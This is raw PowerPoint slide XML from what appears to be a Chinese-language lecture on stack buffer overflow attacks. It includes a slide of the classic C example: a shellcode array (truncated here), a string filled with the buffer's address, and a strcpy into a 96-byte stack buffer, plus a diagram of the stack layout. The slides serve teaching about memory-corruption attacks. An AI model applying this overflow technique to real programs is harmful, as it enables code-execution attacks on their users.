              <a:t>将攻击代码注入内存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将函数返回地址指针指向已注入攻击代码的内存地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击示意</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57346" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F2801DBE-64BA-4A2A-8E98-13239B2D96D9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="457200"/>
            <a:ext cx="7793038" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57349" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2483768" y="3068960"/>
            <a:ext cx="3505200" cy="3022600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57349"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8"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a:xfrm>
            <a:off x="6705600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C12DE5EA-BEED-4AEF-8FA3-E870D67808B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968375" y="1844675"/>
            <a:ext cx="7924800" cy="4679950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>char shellcode[] = "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>\x1f\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>[128];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>argv</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char buffer[96];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</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long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>large_string</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> &lt; 32; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) buffer;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> &lt; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(shellcode); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>] = shellcode[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272388" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="2749550"/>
            <a:ext cx="1600200" cy="4222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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302375" y="3168650"/>
            <a:ext cx="1600200" cy="16938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Buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>(96bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272390" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302375" y="4862513"/>
            <a:ext cx="1600200" cy="4572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i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272391" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302375" y="5319713"/>
            <a:ext cx="1600200" cy="4572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long_ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272392" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8323263" y="2154238"/>
            <a:ext cx="11112" cy="3633787"/>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393" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7902575" y="177323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高地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272394" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7902575" y="5788025"/>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低地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272395" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="2327275"/>
            <a:ext cx="1600200" cy="4222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Para2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272396" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="1906588"/>
            <a:ext cx="1600200" cy="4222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Para1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="272397" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="2332038"/>
            <a:ext cx="1600200" cy="2527300"/>
            <a:chOff x="2493" y="1133"/>
            <a:chExt cx="1008" cy="1592"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272398" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="2459"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272399" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="2194"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272400" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1929"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272401" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1663"/>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2402" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1398"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272403" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1133"/>
              <a:ext cx="1008" cy="26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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272404" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="4025900"/>
            <a:ext cx="1600200" cy="828675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="272405" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6037263" y="3001963"/>
            <a:ext cx="263525" cy="1843087"/>
            <a:chOff x="3666" y="1671"/>
            <a:chExt cx="166" cy="1161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272406" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3678" y="1671"/>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7" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3666" y="1671"/>
              <a:ext cx="0" cy="115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8" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3669" y="2832"/>
              <a:ext cx="163" cy="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2410" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈溢出攻击示例</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272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
